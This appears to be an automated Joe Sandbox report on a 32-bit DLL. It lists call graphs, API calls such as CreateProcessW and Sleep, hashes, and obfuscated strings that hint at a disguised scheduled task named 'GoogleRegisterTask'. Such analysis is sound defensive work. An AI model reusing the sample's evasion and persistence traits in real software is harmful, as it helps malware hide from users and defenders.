6b937a42 16033->16035 16034->16028 16035->16018 16036->16011 16037->15994 16043 6b92ecf6 16038->16043 16041 6b926868 ___vcrt_uninitialize_ptd 6 API calls 16042 6b924d4a 16041->16042 16042->13801 16046 6b92f768 16043->16046 16047 6b92f772 16046->16047 16048 6b925249 16046->16048 16050 6b9318f1 16047->16050 16048->16041 16051 6b9317ce _unexpected 5 API calls 16050->16051 16052 6b93190d 16051->16052 16053 6b931916 16052->16053 16054 6b931928 TlsFree 16052->16054 16053->16048 16201 6b92e7f2 16216 6b934512 16201->16216 16206 6b92e81a 16243 6b92e84b 16206->16243 16207 6b92e80e 16208 6b930444 __freea 14 API calls 16207->16208 16210 6b92e814 16208->16210 16212 6b930444 __freea 14 API calls 16213 6b92e83e 16212->16213 16214 6b930444 __freea 14 API calls 16213->16214 16215 6b92e844 16214->16215 16217 6b92e803 16216->16217 16218 6b93451b 16216->16218 16222 6b9349e8 GetEnvironmentStringsW 16217->16222 16265 6b92f552 16218->16265 16223 6b934a00 16222->16223 16224 6b92e808 16222->16224 16225 6b934945 __vfwprintf_l WideCharToMultiByte 16223->16225 16224->16206 16224->16207 16226 6b934a1d 16225->16226 16227 6b934a32 16226->16227 16228 6b934a27 FreeEnvironmentStringsW 16226->16228 16229 6b93047e __fread_nolock 15 API calls 16227->16229 16228->16224 16230 6b934a39 16229->16230 16231 6b934a52 16230->16231 16232 6b934a41 16230->16232 16234 6b934945 __vfwprintf_l WideCharToMultiByte 16231->16234 16233 6b930444 __freea 14 API calls 16232->16233 16235 6b934a46 FreeEnvironmentStringsW 16233->16235 16236 6b934a62 16234->16236 16235->16224 16237 6b934a71 16236->16237 16238 6b934a69 16236->16238 16240 6b930444 __freea 14 API calls 16237->16240 16239 6b930444 __freea 14 API calls 16238->16239 16241 6b934a6f FreeEnvironmentStringsW 16239->16241 16240->16241 16241->16224 16244 6b92e860 16243->16244 16245 6b931658 _unexpected 14 API calls 16244->16245 16246 6b92e887 16245->16246 16247 6b92e88f 16246->16247 16256 6b92e899 16246->16256 16248 6b930444 __freea 14 API calls 16247->16248 16264 6b92e821 16248->16264 16249 6b92e8f6 16250 6b930444 __freea 14 API calls 16249->16250 16250->16264 16251 6b931658 _unexpected 14 API calls 16251->16256 16252 6b92e905 16253 6b92e92d 14 API calls 16252->16253 16255 6b92e90b 16253->16255 16257 6b930444 __freea 14 API calls 16255->16257 16256->16249 16256->16251 16256->16252 16258 6b92e920 16256->16258 16260 6b930444 __freea 14 API calls 16256->16260 16438 6b92ed88 16256->16438 16259 6b92e912 16257->16259 16261 6b92df26 __vfwprintf_l 11 API calls 16258->16261 16262 6b930444 __freea 14 API calls 16259->16262 16260->16256 16263 6b92e92c 16261->16263 16262->16264 16264->16212 16266 6b92f563 16265->16266 16267 6b92f55d 16265->16267 16268 6b93196f _unexpected 6 API calls 16266->16268 16288 6b92f569 16266->16288 16269 6b931930 _unexpected 6 API calls 16267->16269 16270 6b92f57d 16268->16270 16269->16266 16271 6b931658 _unexpected 14 API calls 16270->16271 16270->16288 16274 6b92f58d 16271->16274 16272 6b92ed44 __FrameHandler3::FrameUnwindToState 39 API calls 16275 6b92f5e7 16272->16275 16273 6b92f56e 16290 6b93431d 16273->16290 16276 6b92f595 16274->16276 16277 6b92f5aa 16274->16277 16278 6b93196f _unexpected 6 API calls 16276->16278 16279 6b93196f _unexpected 6 API calls 16277->16279 16280 6b92f5a1 16278->16280 16281 6b92f5b6 16279->16281 16286 6b930444 __freea 14 API calls 16280->16286 16282 6b92f5ba 16281->16282 16283 6b92f5c9 16281->16283 16284 6b93196f _unexpected 6 API calls 16282->16284 16285 6b92f299 _unexpected 14 API calls 16283->16285 16284->16280 16287 6b92f5d4 16285->16287 16286->16288 16289 6b930444 __freea 14 API calls 16287->16289 16288->16272 16288->16273 16289->16273 16313 6b934472 16290->16313 16295 6b93047e __fread_nolock 15 API calls 16296 6b934371 16295->16296 16297 6b934387 16296->16297 16298 6b934379 16296->16298 16331 6b93456d 16297->16331 16299 6b930444 __freea 14 API calls 16298->16299 16302 6b934360 16299->16302 16302->16217 16303 6b9343bf 16304 6b930431 __dosmaperr 14 API calls 16303->16304 16305 6b9343c4 16304->16305 16307 6b930444 __freea 14 API calls 16305->16307 16306 6b934406 16309 6b93444f 16306->16309 16342 6b933f96 16306->16342 16307->16302 16308 6b9343da 16308->16306 16312 6b930444 __freea 14 API calls 16308->16312 16311 6b930444 __freea 14 API calls 16309->16311 16311->16302 16312->16306 16314 6b93447e __FrameHandler3::FrameUnwindToState 16313->16314 16315 6b934498 16314->16315 16350 6b93351f RtlEnterCriticalSection 16314->16350 16317 6b934347 16315->16317 16320 6b92ed44 __FrameHandler3::FrameUnwindToState 39 API calls 16315->16320 16324 6b9340a4 16317->16324 16318 6b9344d4 16351 6b9344f1 16318->16351 16321 6b934511 16320->16321 16322 6b9344a8 16322->16318 16323 6b930444 __freea 14 API calls 16322->16323 16323->16318 16325 6b93150b __DllMainCRTStartup@12 39 API calls 16324->16325 16326 6b9340b6 16325->16326 16327 6b9340d7 16326->16327 16328 6b9340c5 GetOEMCP 16326->16328 16329 6b9340dc GetACP 16327->16329 16330 6b9340ee 16327->16330 16328->16330 16329->16330 16330->16295 16330->16302 16332 6b9340a4 41 API calls 16331->16332 16333 6b93458d 16332->16333 16334 6b9345e5 __fread_nolock 16333->16334 16336 6b9345ca IsValidCodePage 16333->16336 16341 6b934692 16333->16341 16355 6b934178 16334->16355 16335 6b924ad5 _ValidateLocalCookies 5 API calls 16337 6b9343b4 16335->16337 16338 6b9345dc 16336->16338 16336->16341 16337->16303 16337->16308 16338->16334 16339 6b934605 GetCPInfo 16338->16339 16339->16334 16339->16341 16341->16335 16343 6b933fa2 __FrameHandler3::FrameUnwindToState 16342->16343 16426 6b93351f RtlEnterCriticalSection 16343->16426 16345 6b933fac 16427 6b933fe3 16345->16427 16350->16322 16354 6b933567 RtlLeaveCriticalSection 16351->16354 16353 6b9344f8 16353->16315 16354->16353 16356 6b9341a0 GetCPInfo 16355->16356 16365 6b934269 16355->16365 16361 6b9341b8 16356->16361 16356->16365 16357 6b924ad5 _ValidateLocalCookies 5 API calls 16359 6b93431b 16357->16359 16358 6b935952 __DllMainCRTStartup@12 42 API calls 16360 6b934220 16358->16360 16359->16341 16366 6b938ee3 16360->16366 16361->16358 16364 6b938ee3 43 API calls 16364->16365 16365->16357 16367 6b93150b __DllMainCRTStartup@12 39 API calls 16366->16367 16368 6b938ef6 16367->16368 16371 6b938cf4 16368->16371 16372 6b938d0f 16371->16372 16399 6b93488b 16372->16399 16374 6b938ece 16375 6b924ad5 _ValidateLocalCookies 5 API calls 16374->16375 16376 6b934241 16375->16376 16376->16364 16377 6b938d53 16377->16374 16378 6b93047e __fread_nolock 15 API calls 16377->16378 16380 6b938d79 __alloca_probe_16 16377->16380 16391 6b938e21 16377->16391 16378->16380 16379 6b935a53 __freea 14 API calls 16379->16374 16381 6b93488b __fread_nolock MultiByteToWideChar 16380->16381 16380->16391 16382 6b938dc2 16381->16382 16382->16391 16402 6b9319fc 16382->16402 16385 6b938e30 16387 6b938eb9 16385->16387 16389 6b93047e __fread_nolock 15 API calls 16385->16389 16392 6b938e42 __alloca_probe_16 16385->16392 16386 6b938df8 16388 6b9319fc 6 API calls 16386->16388 16386->16391 16390 6b935a53 __freea 14 API calls 16387->16390 16388->16391 16389->16392 16390->16391 16391->16379 16392->16387 16393 6b9319fc 6 API calls 16392->16393 16394 6b938e85 16393->16394 16394->16387 16408 6b934945 16394->16408 16396 6b938e9f 16396->16387 16397 6b938ea8 16396->16397 16411 6b935a53 16397->16411 16415 6b9347f3 16399->16415 16417 6b9316cf 16402->16417 16406 6b931a4d LCMapStringW 16407 6b931a0d 16406->16407 16407->16385 16407->16386 16407->16391 16410 6b934958 __vfwprintf_l 16408->16410 16409 6b934996 WideCharToMultiByte 16409->16396 16410->16409 16412 6b935a70 16411->16412 16413 6b935a5f 16411->16413 16412->16391 16413->16412 16414 6b930444 __freea 14 API calls 16413->16414 16414->16412 16416 6b934804 MultiByteToWideChar 16415->16416 16416->16377 16418 6b9317ce _unexpected 5 API calls 16417->16418 16419 6b9316e5 16418->16419 16419->16407 16420 6b931a59 16419->16420 16423 6b9316e9 16420->16423 16422 6b931a64 16422->16406 16424 6b9317ce _unexpected 5 API calls 16423->16424 16425 6b9316ff 16424->16425 16425->16422 16426->16345 16428 6b92dc53 __fread_nolock 39 API calls 16427->16428 16429 6b934005 16428->16429 16430 6b92dc53 __fread_nolock 39 API calls 16429->16430 16431 6b934024 16430->16431 16432 6b933fb9 16431->16432 16433 6b930444 __freea 14 API calls 16431->16433 16434 6b933fd7 16432->16434 16433->16432 16437 6b933567 RtlLeaveCriticalSection 16434->16437 16436 6b933fc5 16436->16309 16437->16436 16439 6b92ed96 16438->16439 16440 6b92eda4 16438->16440 16439->16440 16445 6b92edbc 16439->16445 16441 6b930431 __dosmaperr 14 API calls 16440->16441 16442 6b92edac 16441->16442 16443 6b92def9 ___std_exception_copy 39 API calls 16442->16443 16444 6b92edb6 16443->16444 16444->16256 16445->16444 16446 6b930431 __dosmaperr 14 API calls 16445->16446 16446->16442 16447 6b92f7fb 16450 6b92f782 16447->16450 16451 6b92f78e __FrameHandler3::FrameUnwindToState 16450->16451 16458 6b93351f RtlEnterCriticalSection 16451->16458 16453 6b92f798 16454 6b92f7c6 16453->16454 16459 6b935692 16453->16459 16463 6b92f7e4 16454->16463 16458->16453 16460 6b9356ad 16459->16460 16461 6b9356a0 _unexpected 16459->16461 16460->16453 16461->16460 16462 6b9353c5 _unexpected 14 API calls 16461->16462 16462->16460 16466 6b933567 RtlLeaveCriticalSection 16463->16466 16465 6b92f7d2 16466->16465

                Executed Functions

                Function 6B921B85 Relevance: 35.3, APIs: 11, Strings: 9, Instructions: 303fileCOMMONLIBRARYCODE
                Download Yara Rule

                Control-flow Graph

                APIs
                • FindFirstFileW.KERNELBASE(?,?,?,?,?,FB32F76A), ref: 6B921C0B
                • _strlen.LIBCMT ref: 6B921D30
                • ExpandEnvironmentStringsW.KERNEL32(?,?,000000FF), ref: 6B921D9D
                • FindNextFileW.KERNELBASE(?,?,?,?,?,FB32F76A), ref: 6B921FAC
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.2078908385.000000006B921000.00000020.00000001.01000000.00000003.sdmp, Offset: 6B920000, based on PE: true
                • Associated: 00000000.00000002.2078893804.000000006B920000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2078928333.000000006B93D000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2078945156.000000006B946000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2078960672.000000006B948000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_6b920000_loaddll32.jbxd
                Similarity
                • API ID: FileFind$EnvironmentExpandFirstNextStrings_strlen
                • String ID: %s\%s$%s\%s$%s\%s$%s\*.*$-a $GoogleRegisterTask$IRA3BDVBaRAtB@VB[BAzBDVBYtAsBKRBOdApBD7BbtB>$PT30S$s`bovb-f{f
                • API String ID: 4146766196-3364674013
                • Opcode ID: 3a4bdf3f3fb1ad213e23c14635e596be27db2fd0df00700b48f7b024f46defc4
                • Instruction ID: 1c06049022173fae5acd135399feb2e4b365ed823bab053bdd85251b73887f1d
                • Opcode Fuzzy Hash: 3a4bdf3f3fb1ad213e23c14635e596be27db2fd0df00700b48f7b024f46defc4
                • Instruction Fuzzy Hash: D5C1AD71C24259ABDF20EFA4CD4ABED3BB8BF06708F604465F904DA185EB39CA54CB51
                Function 6B924402 Relevance: 31.8, APIs: 9, Strings: 9, Instructions: 260sleepCOMMONLIBRARYCODE
                Download Yara Rule

                Control-flow Graph

                APIs
                  • Part of subcall function 6B92171F: GetModuleHandleW.KERNEL32(kernel32.dll), ref: 6B92175A
                  • Part of subcall function 6B92171F: _strlen.LIBCMT ref: 6B92177C
                  • Part of subcall function 6B92171F: GetProcAddress.KERNEL32(?), ref: 6B9217E2
                  • Part of subcall function 6B92171F: _strlen.LIBCMT ref: 6B92180D
                • _strlen.LIBCMT ref: 6B924460
                • GetEnvironmentVariableW.KERNEL32(?,?,00000032), ref: 6B9244CA
                • _strlen.LIBCMT ref: 6B9244F0
                • _strlen.LIBCMT ref: 6B924571
                • _strlen.LIBCMT ref: 6B9245E8
                  • Part of subcall function 6B92192F: _strlen.LIBCMT ref: 6B9219BD
                  • Part of subcall function 6B92192F: CreateProcessW.KERNELBASE(00000000,?,00000000,00000000,00000000,08000000,00000000,00000000,?,6B9474C4), ref: 6B921A5E
                • Sleep.KERNELBASE(000005DC), ref: 6B924654
                • Sleep.KERNELBASE(00007530), ref: 6B92465F
                • _strlen.LIBCMT ref: 6B924685
                • _strlen.LIBCMT ref: 6B924706
                  • Part of subcall function 6B921B85: FindFirstFileW.KERNELBASE(?,?,?,?,?,FB32F76A), ref: 6B921C0B
                Strings
                • %s%s, xrefs: 6B9246C4
                • %s%s, xrefs: 6B92452F
                • [BAABKBB`BAFBDFBgBAkBEtBVdAuBDFBaRAsBD7BYtA`BF3BbRAiBKJBatAyBD;BYdA3BEtBUdAkBKVBaBA3BEtBVtAoBDNBgRAzBDVBRdAuBD;BgBAUBFVBQdAIB@7BYBAkBB>>, xrefs: 6B9246E6
                • bBA3BKRB`BAyBGlBOtBuBKJBZRAwBD3BYRAvBDFBaBAoB@7BZtAuBD3BOtAnBD;B`dBzB@;BZRAiBDtBatAmB@7BgBA7BKRB, xrefs: 6B9245C8
                • gRAyBDVB`dAtBKJBatAnBDhBaBAoBB>>, xrefs: 6B924440
                • %s%s, xrefs: 6B924745
                • [BAABKBB`BAFBDFBgBAkBEtBWBAuBDNBZRApBEtBWRAsBDNB`dAuBKNBatAnBKRB[BA[BDhBadAhBD;BgtAyBEtBPRALBDVBgBAGBDFBZtAlBDVB[BAIBFVB, xrefs: 6B924665
                • VtAuBDZBgBA0BDFB`dAoBEtBRtApBDFB`tAyBDVB`tA`BFNBWBAWBFhBQBA`BKpBNBAjBGhBNRAkBG`BMBAjB@3BZRAhBG`BZtBwBGRBZRB6BDRBORAjBGVBMdByB@3BNdB6BDVBYRAnBGhBNRB1BG`BNRB0BGJBeRA`BFhBadAtBKJBatAiBENBYRAzBKZBYRAzBGNBNdB>, xrefs: 6B924551
                • [BAABKBB`BAFBDFBgBAkBEtBVdAuBDFBaRAsBD7BYtA`BF3BbRAiBKJBatAyBD;BYdA3BEtBRtAzBKhB`BA3BD;B[BAiBKJBfRAtBKRBLBB1B@7BYBAkBKRB, xrefs: 6B9244D0
                Memory Dump Source
                • Source File: 00000000.00000002.2078908385.000000006B921000.00000020.00000001.01000000.00000003.sdmp, Offset: 6B920000, based on PE: true
                • Associated: 00000000.00000002.2078893804.000000006B920000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2078928333.000000006B93D000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2078945156.000000006B946000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2078960672.000000006B948000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_6b920000_loaddll32.jbxd
                Similarity
                • API ID: _strlen$Sleep$AddressCreateEnvironmentFileFindFirstHandleModuleProcProcessVariable
                • String ID: %s%s$%s%s$%s%s$VtAuBDZBgBA0BDFB`dAoBEtBRtApBDFB`tAyBDVB`tA`BFNBWBAWBFhBQBA`BKpBNBAjBGhBNRAkBG`BMBAjB@3BZRAhBG`BZtBwBGRBZRB6BDRBORAjBGVBMdByB@3BNdB6BDVBYRAnBGhBNRB1BG`BNRB0BGJBeRA`BFhBadAtBKJBatAiBENBYRAzBKZBYRAzBGNBNdB>$[BAABKBB`BAFBDFBgBAkBEtBVdAuBDFBaRAsBD7BYtA`BF3BbRAiBKJBatAyBD;BYdA3BEtBRtAzBKhB`BA3BD;B[BAiBKJBfRAtBKRBLBB1B@7BYBAkBKRB$[BAABKBB`BAFBDFBgBAkBEtBVdAuBDFBaRAsBD7BYtA`BF3BbRAiBKJBatAyBD;BYdA3BEtBUdAkBKVBaBA3BEtBVtAoBDNBgRAzBDVBRdAuBD;BgBAUBFVBQdAIB@7BYBAkBB>>$[BAABKBB`BAFBDFBgBAkBEtBWBAuBDNBZRApBEtBWRAsBDNB`dAuBKNBatAnBKRB[BA[BDhBadAhBD;BgtAyBEtBPRALBDVBgBAGBDFBZtAlBDVB[BAIBFVB$bBA3BKRB`BAyBGlBOtBuBKJBZRAwBD3BYRAvBDFBaBAoB@7BZtAuBD3BOtAnBD;B`dBzB@;BZRAiBDtBatAmB@7BgBA7BKRB$gRAyBDVB`dAtBKJBatAnBDhBaBAoBB>>
                • API String ID: 405535372-2132796354
                • Opcode ID: c204671a4d5e5b8c22c43bd213b84e4cfe33b495e8799ec3bd81a89ba71fe9a0
                • Instruction ID: 73e30f6645525a1c54cbd50ef7894b6c9cb25dd10adf6a9621a040bc308ca4aa
                • Opcode Fuzzy Hash: c204671a4d5e5b8c22c43bd213b84e4cfe33b495e8799ec3bd81a89ba71fe9a0
                • Instruction Fuzzy Hash: D2A138B2C4025CABDF31DBB8DC86FDD7BB8AF1920CF104025E914A7286EB3992158F55
                Function 6B92192F Relevance: 14.2, APIs: 4, Strings: 4, Instructions: 174processCOMMONLIBRARYCODE
                Download Yara Rule

                Control-flow Graph

                APIs
                • _strlen.LIBCMT ref: 6B9219BD
                • CreateProcessW.KERNELBASE(00000000,?,00000000,00000000,00000000,08000000,00000000,00000000,?,6B9474C4), ref: 6B921A5E
                • _strlen.LIBCMT ref: 6B921AC4
                • CreateProcessW.KERNELBASE(00000000,?,00000000,00000000,00000000,08000000,00000000,00000000,?,6B9474E0), ref: 6B921B60
                Strings
                • bBA3BKRB`BAyBGlBOtBuBKJBZRAwBD3BYRAvBDFBaBAoB@7BZtAuBD3BOtAnBD;B`dBzB@;B`dAoBD`BbRA3B@7BgBAwBKBB, xrefs: 6B921AA4
                • `dA2BD7BYBApBDtBNtBzB@7BYRA7BDVBJBAGBGlB[BA[BDhBadAhBD;BgtAyBEtBVtA6BKNBgBAoBD3BNtBzBEtB`tAlBDhBaRAmBKZBgtBvBDRBaBApB@tBPRAwBDFBYtAoBEZBbRAoBK`B[tADBKVBaBApBKNBZtAzBDVBYRAvBB>>, xrefs: 6B92199D
                • %s %s, xrefs: 6B921A24
                • %s %s, xrefs: 6B921B26
                Memory Dump Source
                • Source File: 00000000.00000002.2078908385.000000006B921000.00000020.00000001.01000000.00000003.sdmp, Offset: 6B920000, based on PE: true
                • Associated: 00000000.00000002.2078893804.000000006B920000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2078928333.000000006B93D000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2078945156.000000006B946000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2078960672.000000006B948000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_6b920000_loaddll32.jbxd
                Similarity
                • API ID: CreateProcess_strlen
                • String ID: %s %s$%s %s$`dA2BD7BYBApBDtBNtBzB@7BYRA7BDVBJBAGBGlB[BA[BDhBadAhBD;BgtAyBEtBVtA6BKNBgBAoBD3BNtBzBEtB`tAlBDhBaRAmBKZBgtBvBDRBaBApB@tBPRAwBDFBYtAoBEZBbRAoBK`B[tADBKVBaBApBKNBZtAzBDVBYRAvBB>>$bBA3BKRB`BAyBGlBOtBuBKJBZRAwBD3BYRAvBDFBaBAoB@7BZtAuBD3BOtAnBD;B`dBzB@;B`dAoBD`BbRA3B@7BgBAwBKBB
                • API String ID: 3222040079-4228346574
                • Opcode ID: 0ec4928c7e7e4d673e1eae0b37eb57f345344c797c0f595e4af2d3bbd3a47c0b
                • Instruction ID: 8e7822752293f62d2feb15488c76926c28e4373ea49bafa1c58a4ea7522ba39a
                • Opcode Fuzzy Hash: 0ec4928c7e7e4d673e1eae0b37eb57f345344c797c0f595e4af2d3bbd3a47c0b
                • Instruction Fuzzy Hash: 5F516071D5024CABEB20DBB4DC42FDD77B8AF1570CF140025E614EA186EBB9E6148B65
                Function 6B924CA3 Relevance: 10.6, APIs: 7, Instructions: 136COMMONLIBRARYCODE
                Download Yara Rule

                Control-flow Graph

                APIs
                • __RTC_Initialize.LIBCMT ref: 6B924CEA
                • ___scrt_uninitialize_crt.LIBCMT ref: 6B924D04
                Memory Dump Source
                • Source File: 00000000.00000002.2078908385.000000006B921000.00000020.00000001.01000000.00000003.sdmp, Offset: 6B920000, based on PE: true
                • Associated: 00000000.00000002.2078893804.000000006B920000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2078928333.000000006B93D000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2078945156.000000006B946000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2078960672.000000006B948000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_6b920000_loaddll32.jbxd
                Similarity
                • API ID: Initialize___scrt_uninitialize_crt
                • String ID:
                • API String ID: 2442719207-0
                • Opcode ID: a8db96b3f68fede142adb9981642cb3d21ae0f1cb3877fa1b21e0522104e8654
                • Instruction ID: b6e57b65ade0c133a72dde679e227e4e8048e8a8daf3721929caeab953e4ed0d
                • Opcode Fuzzy Hash: a8db96b3f68fede142adb9981642cb3d21ae0f1cb3877fa1b21e0522104e8654
                • Instruction Fuzzy Hash: CF41E272D24624AFEB119F68CC41BAE7BA8EF91B58F014155EA146735CD738DD018FE0
                Function 6B924D53 Relevance: 7.6, APIs: 5, Instructions: 87COMMONLIBRARYCODE
                Download Yara Rule

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 242 6b924d53-6b924d64 call 6b925570 245 6b924d66-6b924d6c 242->245 246 6b924d75-6b924d7c 242->246 245->246 249 6b924d6e-6b924d70 245->249 247 6b924d88-6b924d9c dllmain_raw 246->247 248 6b924d7e-6b924d81 246->248 252 6b924da2-6b924db3 dllmain_crt_dispatch 247->252 253 6b924e45-6b924e4c 247->253 248->247 251 6b924d83-6b924d86 248->251 250 6b924e4e-6b924e5d 249->250 254 6b924db9-6b924dbe call 6b921000 251->254 252->253 252->254 253->250 256 6b924dc3-6b924dcb 254->256 257 6b924df4-6b924df6 256->257 258 6b924dcd-6b924dcf 256->258 260 6b924df8-6b924dfb 257->260 261 6b924dfd-6b924e0e dllmain_crt_dispatch 257->261 258->257 259 6b924dd1-6b924def call 6b921000 call 6b924ca3 dllmain_raw 258->259 259->257 260->253 260->261 261->253 262 6b924e10-6b924e42 dllmain_raw 261->262 262->253
                APIs
                Memory Dump Source
                • Source File: 00000000.00000002.2078908385.000000006B921000.00000020.00000001.01000000.00000003.sdmp, Offset: 6B920000, based on PE: true
                • Associated: 00000000.00000002.2078893804.000000006B920000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2078928333.000000006B93D000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2078945156.000000006B946000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2078960672.000000006B948000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_6b920000_loaddll32.jbxd
                Similarity
                • API ID: dllmain_raw$dllmain_crt_dispatch
                • String ID:
                • API String ID: 3136044242-0
                • Opcode ID: 0732268a67b247a0e7c1b0cb0901112ae1c37e0af4b8a850df3c23f3c36f9d3f
                • Instruction ID: ce7cc07099c18a497944fa6da52c97b08fcff70d4221a9d8e28422aca8c2b582
                • Opcode Fuzzy Hash: 0732268a67b247a0e7c1b0cb0901112ae1c37e0af4b8a850df3c23f3c36f9d3f
                • Instruction Fuzzy Hash: 0F218071D10625AFEB214F65CC41A6F3A69EB85A98B014155FE2857318D339DE018FE0
                Function 6B924B9C Relevance: 3.1, APIs: 2, Instructions: 76COMMON
                Download Yara Rule

                Control-flow Graph

                APIs
                • __RTC_Initialize.LIBCMT ref: 6B924BE9
                  • Part of subcall function 6B9250D5: RtlInitializeSListHead.KERNEL32(6B946DC0,6B924BF3,6B9441F8,00000010,6B924B84,?,?,?,6B924DAC,?,00000001,?,?,00000001,?,6B944240), ref: 6B9250DA
                • ___scrt_is_nonwritable_in_current_image.LIBCMT ref: 6B924C53
                Memory Dump Source
                • Source File: 00000000.00000002.2078908385.000000006B921000.00000020.00000001.01000000.00000003.sdmp, Offset: 6B920000, based on PE: true
                • Associated: 00000000.00000002.2078893804.000000006B920000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2078928333.000000006B93D000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2078945156.000000006B946000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2078960672.000000006B948000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_6b920000_loaddll32.jbxd
                Similarity
                • API ID: Initialize$HeadList___scrt_is_nonwritable_in_current_image
                • String ID:
                • API String ID: 3231365870-0
                • Opcode ID: b6a72d304883c8d258b923b2589df85b0894e918534115330e9d608ed15e218b
                • Instruction ID: 5aec498df37c5461c11c63761ef7969e335287be0ee9519e1e0c053f2a50f735
                • Opcode Fuzzy Hash: b6a72d304883c8d258b923b2589df85b0894e918534115330e9d608ed15e218b
                • Instruction Fuzzy Hash: E321F371EA8201ABDB19EFB898167DC37A59F2332CF008499D641273CDDB7DD044DA62
                Function 6B930258 Relevance: 3.1, APIs: 2, Instructions: 65COMMON
                Download Yara Rule

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 311 6b930258-6b93025d 312 6b93025f-6b930277 311->312 313 6b930285-6b93028e 312->313 314 6b930279-6b93027d 312->314 316 6b9302a0 313->316 317 6b930290-6b930293 313->317 314->313 315 6b93027f-6b930283 314->315 318 6b9302fa-6b9302fe 315->318 321 6b9302a2-6b9302af GetStdHandle 316->321 319 6b930295-6b93029a 317->319 320 6b93029c-6b93029e 317->320 318->312 322 6b930304-6b930307 318->322 319->321 320->321 323 6b9302b1-6b9302b3 321->323 324 6b9302dc-6b9302ee 321->324 323->324 325 6b9302b5-6b9302be GetFileType 323->325 324->318 326 6b9302f0-6b9302f3 324->326 325->324 327 6b9302c0-6b9302c9 325->327 326->318 328 6b9302d1-6b9302d4 327->328 329 6b9302cb-6b9302cf 327->329 328->318 330 6b9302d6-6b9302da 328->330 329->318 330->318
                APIs
                • GetStdHandle.KERNEL32(000000F6), ref: 6B9302A4
                • GetFileType.KERNELBASE(00000000), ref: 6B9302B6
                Memory Dump Source
                • Source File: 00000000.00000002.2078908385.000000006B921000.00000020.00000001.01000000.00000003.sdmp, Offset: 6B920000, based on PE: true
                • Associated: 00000000.00000002.2078893804.000000006B920000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2078928333.000000006B93D000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2078945156.000000006B946000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2078960672.000000006B948000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_6b920000_loaddll32.jbxd
                Similarity
                • API ID: FileHandleType
                • String ID:
                • API String ID: 3000768030-0
                • Opcode ID: 17ac3094462a3919286bdeed36754eb124592eba934e5aef9f9c9d97c16cb0a5
                • Instruction ID: 98619f29e87463e0b406f706244dd55b29cf41d60b34c8eceaf3705e24040df7
                • Opcode Fuzzy Hash: 17ac3094462a3919286bdeed36754eb124592eba934e5aef9f9c9d97c16cb0a5
                • Instruction Fuzzy Hash: A21193716487A24AC7228A3E8CC4712BB98AB4B770B34079AD4B6965F1C738D886C342
                Function 6B931658 Relevance: 1.5, APIs: 1, Instructions: 39memoryCOMMONLIBRARYCODE
                Download Yara Rule

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 331 6b931658-6b931663 332 6b931671-6b931677 331->332 333 6b931665-6b93166f 331->333 335 6b931690-6b9316a1 RtlAllocateHeap 332->335 336 6b931679-6b93167a 332->336 333->332 334 6b9316a5-6b9316b0 call 6b930431 333->334 340 6b9316b2-6b9316b4 334->340 337 6b9316a3 335->337 338 6b93167c-6b931683 call 6b935ac9 335->338 336->335 337->340 338->334 344 6b931685-6b93168e call 6b92df8f 338->344 344->334 344->335
                APIs
                • RtlAllocateHeap.NTDLL(00000008,6B921775,6B92C75A,?,6B92F6DC,00000001,00000364,00000007,000000FF,6B92C75A,6B92C75A,?,6B928182,6B92DE7A,F08BD84D), ref: 6B931699
                Memory Dump Source
                • Source File: 00000000.00000002.2078908385.000000006B921000.00000020.00000001.01000000.00000003.sdmp, Offset: 6B920000, based on PE: true
                • Associated: 00000000.00000002.2078893804.000000006B920000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2078928333.000000006B93D000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2078945156.000000006B946000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2078960672.000000006B948000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_6b920000_loaddll32.jbxd
